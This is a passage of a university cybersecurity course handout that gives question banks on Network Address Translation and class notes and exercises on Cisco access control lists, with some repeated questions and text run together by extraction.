3. Which layer of the OSI model does NAT operate at?
4. What is the difference between static NAT and dynamic NAT?
5. How does Network Address Translation (NAT) help conserve IPv4 address space?
6. Which type of NAT allows multiple devices on an internal network to share a single
public IP address?
7. What is the difference between source NAT and destination NAT?
8. What is a NAT translation table?
9. Which NAT mechanism allows devices behind a NAT device to establish connections
with external devices?
10. What is the purpose of NAT overload?
11. What is the difference between NAT and PAT?
12. What is the purpose of NAT traversal?
13. What are the benefits of using NAT for security purposes?
14. What is a NAT translation error?
15. Which command is used to configure static NAT on a Cisco router?
16. Which NAT mechanism is used for mapping a range of internal IP addresses to a
range of public IP addresses?
17. Which statement accurately describes NAT overload?
18. Which type of NAT allows traffic initiated from the internal network to flow out to the
internet but prevents unsolicited inbound traffic?
19. What is the purpose of NAT in load balancing scenarios?
20. What is the purpose of NAT in high availability scenarios?
21. What is the purpose of NAT in VPN connections?
22. What is the difference between inside local, inside global, outside local, and outside
global addresses in NAT?
23. What is the purpose of NAT reflection?
24. What are the limitations of using NAT in a network environment?
25. What is a NAT translation error?
26. What is the purpose of NAT traversal?
27. What is the purpose of a NAT gateway?
28. What is the difference between static NAT and dynamic NAT?
29. What is the purpose of NAT in a network?
30. Which statement accurately describes PAT (Port Address Translation)?
31. What is the purpose of NAT in load balancing scenarios?
32. What is the purpose of NAT in VPN connections?

2022-23 Prepared by: Dept. Of Cyber Security (Brainware University, Barasat)

BRAINWARE UNIVERSITY
SAQ
1. What is Network Address Translation (NAT)?
[Bncs502B]
2. Differentiate between static NAT and dynamic NAT. [Security Specialist]
3. How does NAT help conserve IPv4 address space?
4. Configure a static NAT translation that maps an internal IP address to a specific
public IP address.
5. Explain the process of NAT translation and how it allows devices with private IP
addresses to communicate with devices on the public internet.
6. Evaluate the advantages and disadvantages of using NAT in a network
environment.
7. Design a NAT configuration that allows multiple devices on an internal network to
share a single public IP address using port address translation (PAT).
8. What are the different types of NAT available in Cisco devices?
9. What is the purpose of NAT overload?
10. How does NAT affect the end-to-end connectivity and communication between
devices in a network?
11. Configure a dynamic NAT pool with a range of public IP addresses for translation.
12. Discuss the potential impact of NAT on network performance and latency.
13. Assess the significance of proper NAT configuration and mapping for seamless
network communication.
14. Create a NAT configuration that allows inbound traffic from a specific external IP
address to an internal server with a private IP address.
15. What are the benefits of using NAT for security purposes?
16. What is the difference between source NAT and destination NAT?
17. How does NAT handle incoming and outgoing traffic differently?
18. Configure a NAT exemption rule to bypass NAT translation for specific traffic.
19. Explain the role of NAT in load balancing and high availability scenarios.
20. Assess the impact of a misconfigured NAT configuration on network connectivity.
21. Design a NAT configuration that allows remote access to internal resources using
VPN tunnels.
22. What is the difference between NAT and PAT?
23. What is a NAT translation table, and how does it function?
24. How does NAT traversal enable communication between devices behind NAT
devices?
25. Configure a one-to-one NAT mapping to allow direct communication between two
internal hosts and their corresponding public IP addresses.
26. Discuss the potential challenges of implementing NAT in a network with peer-to-
peer applications.
27. Evaluate the security implications of NAT for hiding internal IP addresses.
28. Create a NAT configuration that allows outbound traffic from an internal network to
the internet while logging all translated IP addresses.
29. What are the limitations of using NAT in a network environment?
30. What is the purpose of configuring NAT on a border router?
BRAINWARE UNIVERSITY
ACL
[Bncs502B] [Security Specialist]

ACCESS CONTROL LIST

CLASS NOTES
Introduction

Cisco Access Control Lists (ACLs) are used in nearly all product lines for several purposes, including
filtering packets (data traffic) as it crosses from an inbound port to an outbound port on a router or
switch, defining classes of traffic, and restricting access to devices or services. Knowing how to
design, configure, and troubleshoot
ACLsisrequiredforallnetworkengineersworkingwithina Cisconetwork.

Objectives:-

The objective is to provide a fundamental explanation of Cisco ACLs with the following topics:

1. An analogy aboutfiltering
2. The uses of ACLs
3. Types of ACLs, operations and best practices
4. Wildcard Masks
5. Configuring named ACLs with examples
6. Monitoring ACLs

Use of ACLs:-
BRAINWARE UNIVERSITY

[Bncs502B] [Security Specialist]

BRAINWARE UNIVERSITY

[Bncs502B] [Security Specialist]

The graphic further clarifies the idea. It is the company’s policy that not all traffic from the computer
on the left will be allowed to exit the router via the interface on the right. Virtually all companies
have detailed security policy (orshould have one) and the policy is followed to implement
proper filtering.

One of the two major reasons to use ACLs in a Cisco network is to either filter traffic going
through the router or switch, or traffic to and from the device. The other reason is to classify traffic
for access to services or to trigger an event.

As the graphic shows, a good place for a filter is between the enterprise network and the Internet.
An entire range of firewalling technologies exist here, and ACLs are one tool.
BRAINWARE UNIVERSITY

[Bncs502B] [Security Specialist]

The graphic illustrates three more uses of ACLs to classify traffic (IP addresses) for specific purposes. For
example, filtering can be used to identify the traffic which is allowed to traverse a virtual private
network (VPN), andthe block of IP addresses to be translated by the network address translation
(NAT) process.

Also, routers and multi-layer switches run dynamic routing protocols such as Open Shortest Path First
(OSPF) and Enhanced Interior Gateway Protocol (EIGRP) to exchange lists of reachable IP networks.
These updates can be filtered with ACLs to limit the number of IP addresses in the list of routes
learned.

Types of ACL:-

ACL Types Description

 Checks source address
Standard ACL  Generally permits or denies entire
protocol suite
 Checks source and destination address
Extended ACL  Generally permits or denies specific
protocols and applications
Named ACL Named ACL use a descriptive name or
number for identification.
Numbered ACL Numbered ACL use a number for
identification
BRAINWARE
Access lists are categorized UNIVERSITY
based on the granularity of the filtering. Similar to the analogy, the
match criteria to ride the chartered trolleys is much more specific than to ride the city bus. Multiple
protocols have ACLs in Cisco, but IP is by far the most common and the only one described here.
[Bncs502B] [Security Specialist]
Standard Access Lists use the simplest matching criteria of all—the source IP address in the IP
packet. Based on matching the source IP address, permit ordeny logic can be applied.

As the name implies, Extended Access Lists use a much more detailed list of match criteria,
including source IP address, destination IP address, protocol type field in the IP header, TCP/UDP
port number, and additional criteria such as time range.

For both types, the wildcard mask identifies a “range” or block of addresses or a specific host.

Cisco ACLs may be numbered or named. A range of numbers for each type of list has been defined by
Cisco, and numbered ACLs have been used for years. The named access list is more convenient
and easier to edit. The operation of each is identical. Named access lists are recommended for
engineers learning ACLs for the first time. Configuration syntax will be covered later.

How to Identify ACLs

ACL Configuration Guidelines

Standard or extended indicates what can be filtered.
Only one ACL per interface, per protocol, and per
direction is allowed.
The order ofBRAINWARE UNIVERSITY
ACL statements controls testing, therefore,
the most specific statements go at the top of the list.
The last ACL test is always an implicit deny
everything else statement, so every list needs at
[Bncs502B] [Security Specialist]
least one permit statement.
ACLs are created globally and then applied to
interfaces for inbound or outbound traffic.
An ACL can filter traffic going through the router, or
traffic to and from the router, depending on how it is
applied.
When placing ACLs in the network:
– Place extended ACLs close to the source
– Place standard ACLs close to the destination

The graphic shows router logic in checking for the existence of and using an outbound ACL. One
thing to note with an outbound list is that the router has already expended the resources to route
the packet before the permit/deny logic is applied to the packet. If the ACL is inbound, the
permit/deny logic is applied before the routing process occurs.
BRAINWARE UNIVERSITY

[Bncs502B] [Security Specialist]

Each line in the list is processed in top-down order. As soon as a match for either permit or deny
happens, the required action is taken and the list processing stops. That is why it is so important to
permit or deny specific itemssuch as hosts before permitting ordenying entire subnets or larger
address blocks.

The last line in all ACLs is an implicit deny of all packets.

2022-23 Prepared by: Dept. Of Cyber Security (Brainware University, Barasat)

BRAINWARE UNIVERSITY

[Bncs502B] [Security Specialist]

MCQ

1.What is an Access Control List (ACL)?

2.Which layer of the OSI model does an ACL operate at?
3.What is the default behavior of an ACL if no permit or deny statements match
the traffic?
4.Which types of ACL can be created on a Cisco device?
5.What is the range of standard ACL numbers on Cisco routers?
6.What is the range of extended ACL numbers on Cisco routers?
7.What is the order of evaluation for ACL entries?
8.Which wildcard mask would match all IP addresses in a subnet?
9.What is the purpose of a wildcard mask in an ACL?
10.Which statement accurately describes standard ACLs?
11.What is the limitation of using standard ACLs?
12.What is the key advantage of using extended ACLs over standard ACLs?
13.Which type of ACL is commonly used for filtering traffic at the edge of a
network?
14.What is the wildcard mask for a subnet with a prefix length of 24?
15.Which statement accurately describes reflexive ACLs?
16.Which command is used to apply an ACL to a specific interface on a Cisco
router?
17.Which action is performed by a router when a packet matches a deny
statement in an ACL?
18.Which statement accurately describes time-based ACLs?
19.What is the purpose of the "established" keyword in an extended ACL?
20.Which type of ACL is used to filter traffic based on upper-layer protocols and
port numbers?
21.What is the purpose of the "log" keyword in an ACL rule?
22.Which command is used to verify the configuration and applied ACLs on a
Cisco router?
23.Which statement accurately describes reflexive ACLs?
24.Which statement accurately describes reflexive ACLs?
25.Which statement accurately describes reflexive ACLs?
26.Which statement accurately describes reflexive ACLs?
27.Which statement accurately describes reflexive ACLs?
28.Which statement accurately describes reflexive ACLs?

2022-23 Prepared by: Dept. Of Cyber Security (Brainware University, Barasat)

BRAINWARE UNIVERSITY

[Bncs502B] [Security Specialist]

SAQ

1. What is an Access Control List (ACL)?

2. Differentiate between standard and extended ACLs.
3. How does an ACL determine which packets are allowed or denied access to a
network?
4. Write an ACL statement that permits all traffic from source IP address
192.168.1.0/24 to destination IP address 10.0.0.0/24.
5. Explain the order in which ACL statements are processed and how that affects
packet filtering.
6. Evaluate the advantages and disadvantages of using ACLs for network security.
7. Design an ACL that allows HTTP traffic from any source IP address but denies
FTP traffic from IP address 192.168.1.5.
8. What are the different types of ACLs available on Cisco devices?
9. What is the purpose of an ACL wildcard mask?
10. How does an implicit "deny all" statement affect the behavior of an ACL?
11. Configure an ACL to permit Telnet traffic from a specific source IP address while
denying all other Telnet traffic.
12. Discuss the potential impact of an incorrect ACL configuration on network traffic
flow.
13. Assess the significance of proper ACL placement within a network topology.
14. Create an extended ACL that allows ICMP traffic from any source IP address to a
specific destination IP address.
15. What are the two primary categories of ACLs based on the direction of packet
filtering?
16. What is the purpose of a numbered ACL?
17. How does a named ACL differ from a numbered ACL in terms of configuration
and usage?
18. Configure a standard ACL that permits SSH traffic from a specific source network
while denying all other SSH traffic.
19. Explain the potential consequences of overlapping ACL statements and how to
resolve them.
20. Assess the impact of a misconfigured ACL on network performance and security.
21. Design an ACL that allows HTTP traffic from a specific source IP address range
and denies HTTPS traffic from any source IP address.
22. What is the order of evaluation for ACL entries?
23. What is an ACL hit count, and how can it be used for troubleshooting?
24. How does an extended ACL differ from a standard ACL in terms of filtering
criteria?
25. Configure an ACL to permit DNS traffic from any source IP address but deny
ICMP traffic from a specific source IP address.
26. Discuss the role of wildcard masks in defining ACL filtering criteria.

2022-23 Prepared by: Dept. Of Cyber Security (Brainware University, Barasat)